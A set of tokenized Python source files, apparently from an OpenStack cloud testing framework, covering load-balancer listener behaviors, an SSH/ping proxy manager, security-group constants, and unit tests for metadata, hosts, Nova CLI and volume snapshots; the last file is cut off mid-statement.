<s> """<STR_LIT>""" <EOL> from cloudcafe . networking . lbaas . common . behaviors import BaseLoadBalancersBehaviors <EOL> class ListenerBehaviors ( BaseLoadBalancersBehaviors ) : <EOL> OBJECT_MODEL = '<STR_LIT>' <EOL> def __init__ ( self , listeners_client , config ) : <EOL> super ( ListenerBehaviors , self ) . __init__ ( <EOL> lbaas_client_type = listeners_client , config = config ) <EOL> def create_active_listener ( <EOL> self , name , load_balancer_id , tenant_id , default_pool_id , <EOL> protocol , protocol_port , description = None , <EOL> connection_limit = None , admin_state_up = None ) : <EOL> """<STR_LIT>""" <EOL> kwargs = { '<STR_LIT:name>' : name , '<STR_LIT>' : load_balancer_id , <EOL> '<STR_LIT>' : tenant_id , '<STR_LIT>' : default_pool_id , <EOL> '<STR_LIT>' : protocol , '<STR_LIT>' : protocol_port , <EOL> '<STR_LIT:description>' : description , <EOL> '<STR_LIT>' : connection_limit , <EOL> '<STR_LIT>' : admin_state_up } <EOL> resp = self . create_active_lbaas_object ( <EOL> lbaas_model_type = self . OBJECT_MODEL , <EOL> kwargs = kwargs ) <EOL> return resp <EOL> def update_listener_and_wait_for_active ( <EOL> self , name = None , description = None , default_pool_id = None , <EOL> load_balancer_id = None , admin_state_up = None ) : <EOL> """<STR_LIT>""" <EOL> kwargs = { '<STR_LIT:name>' : name , '<STR_LIT:description>' : description , <EOL> '<STR_LIT>' : default_pool_id , <EOL> '<STR_LIT>' : load_balancer_id , <EOL> '<STR_LIT>' : admin_state_up } <EOL> resp = self . update_lbaas_object_and_wait_for_active ( <EOL> lbaas_model_type = self . OBJECT_MODEL , <EOL> kwargs = kwargs ) <EOL> return resp <EOL> def wait_for_listener_status ( self , listener_id , desired_status , <EOL> interval_time = None , timeout = None ) : <EOL> """<STR_LIT>""" <EOL> kwargs = { '<STR_LIT>' : listener_id , <EOL> '<STR_LIT>' : desired_status , <EOL> '<STR_LIT>' : interval_time , <EOL> '<STR_LIT>' : timeout } <EOL> resp = self . 
wait_for_lbaas_object_status ( <EOL> lbaas_model_type = self . OBJECT_MODEL , ** kwargs ) <EOL> return resp </s>
<s> from cafe . common . reporting import cclogging <EOL> from cloudcafe . networking . networks . common . proxy_mgr . ping_util import PingMixin <EOL> from cloudcafe . networking . networks . common . proxy_mgr . ssh_util import SshMixin <EOL> class NoPasswordProvided ( Exception ) : <EOL> def __init__ ( self ) : <EOL> self . message = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def __str__ ( self ) : <EOL> return self . message <EOL> class NetworkProxyMgr ( PingMixin , SshMixin ) : <EOL> LINUX = '<STR_LIT>' <EOL> WINDOWS = '<STR_LIT>' <EOL> OS = [ LINUX , WINDOWS ] <EOL> DEFAULT_USER = '<STR_LIT:root>' <EOL> PROMPT_PATTERN = r'<STR_LIT>' <EOL> STANDARD_CMD_DELAY = <NUM_LIT:0.5> <EOL> def __init__ ( self , use_proxy = True , proxy_os = LINUX , ip_version = <NUM_LIT:4> , <EOL> logger = None , debug = False ) : <EOL> """<STR_LIT>""" <EOL> self . use_proxy = use_proxy <EOL> self . _proxy_svr = None <EOL> self . _proxy_ip = None <EOL> self . _proxy_os = proxy_os <EOL> self . _ip_version = ip_version <EOL> self . logger = logger or cclogging . getLogger ( <EOL> cclogging . get_object_namespace ( self . __class__ ) ) <EOL> self . connection = None <EOL> self . debug = debug <EOL> self . session_password = None <EOL> self . prompt_pattern = self . PROMPT_PATTERN <EOL> self . last_response = None <EOL> self . _conn_path = [ ] <EOL> self . _pexpect_cmd_delay = self . STANDARD_CMD_DELAY <EOL> def set_proxy_server ( <EOL> self , server_obj , username = DEFAULT_USER , password = None ) : <EOL> """<STR_LIT>""" <EOL> if password is not None : <EOL> server_obj . admin_pass = password <EOL> if ( not hasattr ( server_obj , '<STR_LIT>' ) or <EOL> getattr ( server_obj , '<STR_LIT>' , None ) is None ) : <EOL> raise NoPasswordProvided ( ) <EOL> server_obj . username = username <EOL> self . _proxy_svr = server_obj <EOL> self . _proxy_ip = getattr ( self . _proxy_svr . addresses . public , <EOL> '<STR_LIT>' . format ( ver = self . 
_ip_version ) ) <EOL> @ property <EOL> def proxy_server_address ( self ) : <EOL> return self . _proxy_ip <EOL> @ property <EOL> def proxy_server_password ( self ) : <EOL> return self . _proxy_svr . admin_pass <EOL> @ proxy_server_password . setter <EOL> def proxy_server_password ( self , password ) : <EOL> self . _proxy_svr . admin_pass = password <EOL> @ property <EOL> def proxy_server_name ( self ) : <EOL> return self . _proxy_svr . name <EOL> @ property <EOL> def proxy_server_user ( self ) : <EOL> return self . _proxy_svr . username <EOL> @ property <EOL> def proxy_server_obj ( self ) : <EOL> return self . _proxy_svr <EOL> @ proxy_server_obj . setter <EOL> def proxy_server_obj ( self , obj ) : <EOL> self . set_proxy_server ( server_obj = obj ) <EOL> def display_conn_info ( self , conn_info ) : <EOL> """<STR_LIT>""" <EOL> output = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) . format ( <EOL> conn = conn_info , stdin = conn_info . stdin , stdout = conn_info . stdout , <EOL> all = conn_info . output ) <EOL> per_command = "<STR_LIT>" <EOL> for cmd , out in conn_info . cmd_output . iteritems ( ) : <EOL> command_str = "<STR_LIT>" . format ( cmd , out ) <EOL> per_command = '<STR_LIT>' . format ( per_command , command_str ) <EOL> self . logger . debug ( "<STR_LIT>" . format ( output , per_command ) ) <EOL> @ staticmethod <EOL> def _connect_to_local_proxy ( ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> def display_conn_info ( conn_info ) : <EOL> print "<STR_LIT>" , conn_info <EOL> print '<STR_LIT>' , conn_info . stdout <EOL> print '<STR_LIT>' , conn_info . stdin <EOL> print '<STR_LIT>' , conn_info . output <EOL> print "<STR_LIT>" <EOL> for cmd , out in conn_info . cmd_output . iteritems ( ) : <EOL> print "<STR_LIT>" . format ( cmd , out ) <EOL> class Proxy ( object ) : <EOL> def __init__ ( self , password = None , username = None , id_ = None ) : <EOL> self . admin_pass = password <EOL> self . username = username <EOL> self . 
id = id_ <EOL> use_proxy = True <EOL> ssh = True <EOL> ping = True <EOL> proxy = NetworkProxyMgr ( use_proxy = use_proxy , ip_version = <NUM_LIT:4> , logger = None , <EOL> debug = True , proxy_os = NetworkProxyMgr . LINUX ) <EOL> username = '<STR_LIT:root>' <EOL> password = '<STR_LIT>' <EOL> proxy . _proxy_ip = '<STR_LIT>' <EOL> target_ip = '<STR_LIT>' <EOL> target_id = '<STR_LIT>' <EOL> proxy . _proxy_svr = Proxy ( <EOL> username = username , password = password , id_ = '<STR_LIT>' ) <EOL> commands = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> if ping : <EOL> print "<STR_LIT>" . format ( target_ip , proxy . ping ( target_ip ) ) <EOL> if ssh : <EOL> response = proxy . ssh_to_target ( <EOL> target_ip = target_ip , user = username , password = password , <EOL> proxy_user = username , proxy_pswd = password , <EOL> proxy_ip = proxy . _proxy_ip , cmds = commands ) <EOL> display_conn_info ( response ) <EOL> print "<STR_LIT>" , proxy . _conn_path </s>
<s> """<STR_LIT>""" <EOL> from cloudcafe . networking . networks . common . constants import NeutronErrorTypes , NeutronResponseCodes <EOL> class SecurityGroupsResponseCodes ( NeutronResponseCodes ) : <EOL> """<STR_LIT>""" <EOL> LIST_SECURITY_GROUPS = <NUM_LIT:200> <EOL> GET_SECURITY_GROUP = <NUM_LIT:200> <EOL> CREATE_SECURITY_GROUP = <NUM_LIT> <EOL> UPDATE_SECURITY_GROUP = <NUM_LIT:200> <EOL> DELETE_SECURITY_GROUP = <NUM_LIT> <EOL> LIST_SECURITY_GROUP_RULES = <NUM_LIT:200> <EOL> GET_SECURITY_GROUP_RULE = <NUM_LIT:200> <EOL> CREATE_SECURITY_GROUP_RULE = <NUM_LIT> <EOL> DELETE_SECURITY_GROUP_RULE = <NUM_LIT> <EOL> class SecurityGroupsErrorTypes ( NeutronErrorTypes ) : <EOL> """<STR_LIT>""" <EOL> EGRESS_SECURITY_GROUP_RULES_NOT_ENABLED = ( <EOL> '<STR_LIT>' ) <EOL> INVALID_INPUT = '<STR_LIT>' <EOL> SECURITY_GROUP_INVALID_ICMP_VALUE = '<STR_LIT>' <EOL> SECURITY_GROUP_INVALID_PORT_VALUE = '<STR_LIT>' <EOL> SECURITY_GROUP_MISSING_ICMP_TYPE = '<STR_LIT>' <EOL> SECURITY_GROUP_NOT_FOUND = '<STR_LIT>' <EOL> SECURITY_GROUP_PROTOCOL_REQUIRED_WITH_PORTS = ( <EOL> '<STR_LIT>' ) <EOL> SECURITY_GROUP_RULE_INVALID_ETHERTYPE = ( <EOL> '<STR_LIT>' ) <EOL> SECURITY_GROUP_RULE_INVALID_PROTOCOL = '<STR_LIT>' <EOL> SECURITY_GROUP_RULE_NOT_FOUND = '<STR_LIT>' </s>
<s> extensions = [ ] <EOL> class ResponseExtensionType ( type ) : <EOL> """<STR_LIT>""" <EOL> global extensions <EOL> def __new__ ( cls , class_name , bases , attrs ) : <EOL> extension = super ( ResponseExtensionType , cls ) . __new__ ( <EOL> cls , class_name , bases , attrs ) <EOL> if extension . __extends__ : <EOL> extensions . append ( extension ) <EOL> return extension <EOL> class SimpleResponseExtension ( object ) : <EOL> """<STR_LIT>""" <EOL> __metaclass__ = ResponseExtensionType <EOL> __extends__ = [ ] <EOL> _sub_attr_map = { } <EOL> @ classmethod <EOL> def extend ( cls , obj , ** kwargs ) : <EOL> if obj . __class__ . __name__ not in cls . __extends__ : <EOL> return obj <EOL> for kw_name , attr_name in cls . _sub_attr_map . items ( ) : <EOL> setattr ( obj , attr_name , kwargs . get ( kw_name , None ) ) <EOL> return obj <EOL> class AttributeAggregatingResponseExtension ( SimpleResponseExtension ) : <EOL> """<STR_LIT>""" <EOL> __extends__ = [ ] <EOL> _prefix = None <EOL> _new_dict_attribute_name = None <EOL> @ classmethod <EOL> def extend ( cls , obj , ** kwargs ) : <EOL> if obj . __class__ . __name__ not in cls . __extends__ : <EOL> return obj <EOL> setattr ( obj , cls . _new_dict_attribute_name , dict ( ) ) <EOL> for key , val in kwargs . iteritems ( ) : <EOL> if key . startswith ( cls . _prefix ) : <EOL> obj . metadata [ key [ len ( cls . _prefix ) : : ] ] = val <EOL> return obj </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> import unittest <EOL> from cloudcafe . compute . common . models . metadata import Metadata , MetadataItem <EOL> class MetadataModelTest ( unittest . TestCase ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> cls . metadata = Metadata ( ) <EOL> cls . metadata [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> cls . expected_xml = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> cls . expected_json = json . dumps ( { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_metadata_xml_serialization ( self ) : <EOL> serialized_metadata = self . metadata . serialize ( '<STR_LIT>' ) <EOL> self . assertEqual ( serialized_metadata , self . expected_xml ) <EOL> def test_metadata_xml_deserialization ( self ) : <EOL> metadata = Metadata . deserialize ( self . expected_xml , '<STR_LIT>' ) <EOL> self . assertIsNotNone ( metadata ) <EOL> self . assertEqual ( metadata . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> def test_metadata_json_serialization ( self ) : <EOL> serialized_metadata = self . metadata . serialize ( '<STR_LIT>' ) <EOL> self . assertEqual ( serialized_metadata , self . expected_json ) <EOL> def test_metadata_json_deserialization ( self ) : <EOL> metadata = Metadata . deserialize ( self . expected_json , '<STR_LIT>' ) <EOL> self . assertIsNotNone ( metadata ) <EOL> self . assertEqual ( metadata . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> class MetadataItemModelTest ( unittest . TestCase ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> cls . meta_item = MetadataItem ( ) <EOL> cls . meta_item [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> cls . expected_xml = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> cls . expected_json = json . dumps ( { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_metadata_item_json_serialization ( self ) : <EOL> serialized_metadata = self . meta_item . serialize ( '<STR_LIT>' ) <EOL> self . assertEqual ( serialized_metadata , self . 
expected_json ) <EOL> def test_metadata_xml_serialization ( self ) : <EOL> serialized_metadata = self . meta_item . serialize ( '<STR_LIT>' ) <EOL> self . assertEqual ( serialized_metadata , self . expected_xml ) <EOL> def test_metadata_xml_deserialization ( self ) : <EOL> meta = MetadataItem . deserialize ( self . expected_xml , '<STR_LIT>' ) <EOL> self . assertIsNotNone ( meta ) <EOL> self . assertEqual ( meta . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> def test_metadata_json_deserialization ( self ) : <EOL> meta = MetadataItem . deserialize ( self . expected_json , '<STR_LIT>' ) <EOL> self . assertIsNotNone ( meta ) <EOL> self . assertEqual ( meta . get ( '<STR_LIT>' ) , '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> from httpretty import HTTPretty <EOL> from cloudcafe . compute . hosts_api . client import HostsClient <EOL> from metatests . cloudcafe . compute . fixtures import ClientTestFixture <EOL> from metatests . cloudcafe . compute . hosts . client . responses import HostsMockResponse <EOL> HOST_NAME = "<STR_LIT>" <EOL> class HostsClientTest ( ClientTestFixture ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> super ( HostsClientTest , cls ) . setUpClass ( ) <EOL> cls . hosts_client = HostsClient ( <EOL> url = cls . COMPUTE_API_ENDPOINT , <EOL> auth_token = cls . AUTH_TOKEN , <EOL> serialize_format = cls . FORMAT , <EOL> deserialize_format = cls . FORMAT <EOL> ) <EOL> cls . hosts_uri = "<STR_LIT>" . format ( cls . COMPUTE_API_ENDPOINT ) <EOL> cls . host_uri = "<STR_LIT>" . format ( cls . hosts_uri , HOST_NAME ) <EOL> cls . mock_response = HostsMockResponse ( cls . FORMAT ) <EOL> def test_list_hosts ( self ) : <EOL> HTTPretty . register_uri ( HTTPretty . GET , self . hosts_uri , <EOL> body = self . mock_response . list_hosts ( ) ) <EOL> response = self . hosts_client . list_hosts ( ) <EOL> self . assertEqual ( <NUM_LIT:200> , response . status_code ) <EOL> self . assertEqual ( self . mock_response . list_hosts ( ) , response . content ) <EOL> def test_get_host ( self ) : <EOL> HTTPretty . register_uri ( HTTPretty . GET , self . host_uri , <EOL> body = self . mock_response . get_host ( ) ) <EOL> response = self . hosts_client . get_host ( HOST_NAME ) <EOL> self . assertEqual ( <NUM_LIT:200> , response . status_code ) <EOL> self . assertEqual ( self . mock_response . get_host ( ) , response . content ) </s>
<s> """<STR_LIT>""" <EOL> import mock <EOL> import unittest <EOL> from cloudcafe . networking . lbaas . lbaas_api . listener . behaviors import ListenerBehaviors <EOL> from cloudcafe . networking . lbaas . lbaas_api . listener . client import ListenersClient <EOL> class ListenerBehaviorsFixture ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> super ( ListenerBehaviorsFixture , cls ) . setUpClass ( ) <EOL> cls . auth_token = "<STR_LIT>" <EOL> cls . url = "<STR_LIT>" <EOL> cls . listener_id = "<STR_LIT>" <EOL> cls . name = "<STR_LIT>" <EOL> cls . load_balancer_id = "<STR_LIT>" <EOL> cls . tenant_id = "<STR_LIT>" <EOL> cls . default_pool_id = "<STR_LIT>" <EOL> cls . protocol = "<STR_LIT>" <EOL> cls . protocol_port = <NUM_LIT> <EOL> cls . description = "<STR_LIT>" <EOL> cls . connection_limit = <NUM_LIT:200> <EOL> cls . admin_state_up = True <EOL> cls . desired_status = "<STR_LIT>" <EOL> cls . interval_time = <NUM_LIT:20> <EOL> cls . timeout = <NUM_LIT> <EOL> cls . listeners_client = ListenersClient ( <EOL> url = cls . url , <EOL> auth_token = cls . auth_token , <EOL> serialize_format = cls . SERIALIZE , <EOL> deserialize_format = cls . DESERIALIZE ) <EOL> cls . listener_behaviors = ListenerBehaviors ( <EOL> listeners_client = cls . listeners_client , config = None ) <EOL> class ListenerBehaviorsTests ( object ) : <EOL> @ mock . patch . object ( ListenerBehaviors , '<STR_LIT>' , <EOL> autospec = True ) <EOL> def test_create_active_listener ( self , mock_request ) : <EOL> create_active_listener_kwargs = ( <EOL> { '<STR_LIT:name>' : self . name , <EOL> '<STR_LIT>' : self . load_balancer_id , <EOL> '<STR_LIT>' : self . tenant_id , <EOL> '<STR_LIT>' : self . default_pool_id , <EOL> '<STR_LIT>' : self . protocol , <EOL> '<STR_LIT>' : self . protocol_port , <EOL> '<STR_LIT:description>' : self . description , <EOL> '<STR_LIT>' : self . connection_limit , <EOL> '<STR_LIT>' : self . admin_state_up } ) <EOL> self . 
listener_behaviors . create_active_listener ( <EOL> ** create_active_listener_kwargs ) <EOL> mock_request . assert_called_once_with ( <EOL> self . listener_behaviors , <EOL> ** create_active_listener_kwargs ) <EOL> @ mock . patch . object ( ListenerBehaviors , <EOL> '<STR_LIT>' , <EOL> autospec = True ) <EOL> def test_update_listener_and_wait_for_active ( self , mock_request ) : <EOL> update_listener_and_wait_for_active_kwargs = ( <EOL> { '<STR_LIT:name>' : self . name , <EOL> '<STR_LIT:description>' : self . description , <EOL> '<STR_LIT>' : self . default_pool_id , <EOL> '<STR_LIT>' : self . load_balancer_id , <EOL> '<STR_LIT>' : self . admin_state_up } ) <EOL> self . listener_behaviors . update_listener_and_wait_for_active ( <EOL> ** update_listener_and_wait_for_active_kwargs ) <EOL> mock_request . assert_called_once_with ( <EOL> self . listener_behaviors , <EOL> ** update_listener_and_wait_for_active_kwargs ) <EOL> @ mock . patch . object ( ListenerBehaviors , <EOL> '<STR_LIT>' , <EOL> autospec = True ) <EOL> def test_wait_for_listener_status ( self , mock_request ) : <EOL> wait_for_listener_status_kwargs = ( <EOL> { '<STR_LIT>' : self . listener_id , <EOL> '<STR_LIT>' : self . desired_status , <EOL> '<STR_LIT>' : self . interval_time , <EOL> '<STR_LIT>' : self . timeout } ) <EOL> self . listener_behaviors . wait_for_listener_status ( <EOL> ** wait_for_listener_status_kwargs ) <EOL> mock_request . assert_called_once_with ( <EOL> self . listener_behaviors , <EOL> ** wait_for_listener_status_kwargs ) <EOL> class ListenersClientTestsXML ( ListenerBehaviorsFixture , <EOL> ListenerBehaviorsTests ) : <EOL> SERIALIZE = '<STR_LIT>' <EOL> DESERIALIZE = '<STR_LIT>' <EOL> class ListenersClientTestsJSON ( ListenerBehaviorsFixture , <EOL> ListenerBehaviorsTests ) : <EOL> SERIALIZE = '<STR_LIT>' <EOL> DESERIALIZE = '<STR_LIT>' </s>
<s> import unittest <EOL> from cloudcafe . openstackcli . novacli . client import NovaCLI <EOL> class NovaCLI_InitializeClientWithAllArguments ( unittest . TestCase ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> cls . novacli = NovaCLI ( <EOL> os_cache = True , timings = True , timeout = <NUM_LIT:30> , <EOL> os_username = '<STR_LIT>' , os_password = '<STR_LIT>' , <EOL> os_tenant_name = '<STR_LIT>' , os_tenant_id = '<STR_LIT>' , <EOL> os_auth_url = '<STR_LIT>' , os_region_name = '<STR_LIT>' , <EOL> os_auth_system = '<STR_LIT>' , service_type = '<STR_LIT>' , <EOL> volume_service_name = '<STR_LIT>' , endpoint_type = '<STR_LIT>' , <EOL> os_compute_api_version = '<STR_LIT>' , os_cacert = '<STR_LIT>' , <EOL> insecure = True , bypass_url = '<STR_LIT>' ) <EOL> cls . base_cmd = cls . novacli . base_cmd ( ) <EOL> def test_os_cache ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_timings ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_timeout ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_os_username ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_os_password ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_os_tenant_name ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_os_tenant_id ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_os_auth_url ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_os_region_name ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_os_auth_system ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_service_type ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_volume_service_name ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . 
base_cmd ) <EOL> def test_endpoint_type ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_os_compute_api_version ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_os_cacert ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_insecure ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_bypass_url ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . base_cmd ) <EOL> def test_no_arguments_positive ( self ) : <EOL> novacli = NovaCLI ( ) <EOL> self . assertEquals ( novacli . base_cmd ( ) . strip ( ) , '<STR_LIT>' ) <EOL> class NovaCLI_CommandSerializationTests_CreateServer ( unittest . TestCase ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> class FakeResponse ( object ) : <EOL> def __init__ ( self , cmd ) : <EOL> self . command = cmd <EOL> self . standard_out = "<STR_LIT>" <EOL> cls . novacli = NovaCLI ( ) <EOL> cls . novacli . run_command = lambda x : FakeResponse ( x ) <EOL> cls . command = cls . novacli . 
create_server ( <EOL> name = '<STR_LIT>' , <EOL> no_service_net = True , <EOL> no_public = True , <EOL> disk_config = '<STR_LIT>' , <EOL> flavor = '<STR_LIT>' , <EOL> image = '<STR_LIT>' , <EOL> boot_volume = '<STR_LIT>' , <EOL> snapshot = '<STR_LIT>' , <EOL> num_instances = '<STR_LIT>' , <EOL> key_name = '<STR_LIT>' , <EOL> user_data = '<STR_LIT>' , <EOL> availability_zone = '<STR_LIT>' , <EOL> security_groups = '<STR_LIT>' , <EOL> swap = <NUM_LIT:100> , <EOL> config_drive = '<STR_LIT>' , <EOL> image_with = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> meta = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> file_ = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> block_device_mapping = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> block_device = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> ephemeral = { '<STR_LIT:size>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> hint = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> nic = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) . command <EOL> def test_no_arguments ( self ) : <EOL> r = self . novacli . create_server ( "<STR_LIT>" ) <EOL> self . assertEqual ( r . command . strip ( ) , "<STR_LIT>" ) <EOL> def test_name ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_no_service_net ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_no_public ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_disk_config ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_flavor ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_image ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_boot_volume ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_snapshot ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_num_instances ( self ) : <EOL> self . 
assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_key_name ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_user_data ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_availability_zone ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_security_groups ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_swap ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_config_drive ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_image_with ( self ) : <EOL> self . assertIn ( <EOL> "<STR_LIT>" , <EOL> self . command ) <EOL> def test_meta ( self ) : <EOL> self . assertIn ( <EOL> "<STR_LIT>" , self . command ) <EOL> self . assertIn ( <EOL> "<STR_LIT>" , self . command ) <EOL> def test_file ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_block_device_mapping ( self ) : <EOL> self . assertIn ( <EOL> "<STR_LIT>" , <EOL> self . command ) <EOL> def test_block_device ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_ephemeral ( self ) : <EOL> self . assertIn ( <EOL> "<STR_LIT>" , <EOL> self . command ) <EOL> def test_hint ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , self . command ) <EOL> def test_nic ( self ) : <EOL> self . assertIn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , self . command ) </s>
<s> """<STR_LIT>""" <EOL> from cafe . drivers . unittest . decorators import data_driven_test , DataDrivenFixture <EOL> from cloudcafe . blockstorage . volumes_api . common . models import statuses <EOL> from cloudcafe . blockstorage . datasets import BlockstorageDatasets <EOL> from cloudroast . blockstorage . volumes_api . fixtures import VolumesTestFixture <EOL> complete_volume_types = BlockstorageDatasets . volume_types ( ) <EOL> complete_volume_types . apply_test_tags ( '<STR_LIT>' ) <EOL> default_volume_type = BlockstorageDatasets . default_volume_type ( ) <EOL> default_volume_type . apply_test_tags ( '<STR_LIT>' ) <EOL> complete_volume_types . merge_dataset_tags ( default_volume_type ) <EOL> @ DataDrivenFixture <EOL> class SnapshotActions ( VolumesTestFixture ) : <EOL> @ data_driven_test ( complete_volume_types ) <EOL> def ddtest_verify_snapshot_status_progression ( <EOL> self , volume_type_name , volume_type_id ) : <EOL> """<STR_LIT>""" <EOL> volume = self . new_volume ( vol_type = volume_type_id ) <EOL> snapshot_name = self . random_snapshot_name ( ) <EOL> snapshot_description = "<STR_LIT>" <EOL> snapshot = self . volumes . behaviors . create_available_snapshot ( <EOL> volume . id_ , name = snapshot_name , description = snapshot_description ) <EOL> self . addCleanup ( <EOL> self . volumes . behaviors . delete_snapshot_confirmed , snapshot . id_ ) <EOL> self . assertEquals ( snapshot . volume_id , volume . id_ ) <EOL> self . assertEquals ( snapshot . name , snapshot_name ) <EOL> self . assertEquals ( snapshot . description , snapshot_description ) <EOL> self . assertIn ( <EOL> snapshot . status , <EOL> [ statuses . Snapshot . AVAILABLE , statuses . Snapshot . CREATING ] ) <EOL> self . assertEquals ( snapshot . size , volume . size ) <EOL> @ data_driven_test ( complete_volume_types ) <EOL> def ddtest_verify_snapshot_restore_to_same_volume_type ( <EOL> self , volume_type_name , volume_type_id ) : <EOL> """<STR_LIT>""" <EOL> original_volume = self . 
new_volume ( vol_type = volume_type_id ) <EOL> snapshot = self . new_snapshot ( original_volume . id_ ) <EOL> resp = self . volumes . client . create_volume ( <EOL> original_volume . size , original_volume . volume_type , <EOL> snapshot_id = snapshot . id_ ) <EOL> self . assertResponseDeserializedAndOk ( resp ) <EOL> self . addCleanup ( <EOL> self . volumes . behaviors . delete_volume_confirmed , resp . entity . id_ ) <EOL> self . assertRestoreSnapshotToVolumeSucceeded ( <EOL> resp . entity . id_ , resp . entity . size ) <EOL> restored_volume = self . volumes . behaviors . get_volume_info ( <EOL> resp . entity . id_ ) <EOL> comparable_attributes_list = [ <EOL> "<STR_LIT:size>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT:status>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> self . assertVolumeAttributesAreEqual ( <EOL> original_volume , restored_volume , <EOL> attr_list = comparable_attributes_list ) <EOL> @ data_driven_test ( complete_volume_types ) <EOL> def ddtest_list_snapshots ( <EOL> self , volume_type_name , volume_type_id ) : <EOL> """<STR_LIT>""" <EOL> volume = self . new_volume ( vol_type = volume_type_id ) <EOL> snapshot = self . new_snapshot ( volume . id_ ) <EOL> resp = self . volumes . client . list_all_snapshots ( ) <EOL> self . assertResponseDeserializedAndOk ( <EOL> resp , '<STR_LIT>' . format ( <EOL> volume . id_ ) ) <EOL> snapshot_list = resp . entity <EOL> self . assertIn ( snapshot . name , [ s . name for s in snapshot_list ] ) <EOL> self . assertIn ( snapshot . id_ , [ s . id_ for s in snapshot_list ] ) <EOL> @ data_driven_test ( complete_volume_types ) <EOL> def ddtest_list_detailed_snapshots ( <EOL> self , volume_type_name , volume_type_id ) : <EOL> """<STR_LIT>""" <EOL> volume = self . new_volume ( vol_type = volume_type_id ) <EOL> snapshot = self . new_snapshot ( volume . id_ ) <EOL> resp = self . volumes . client . 
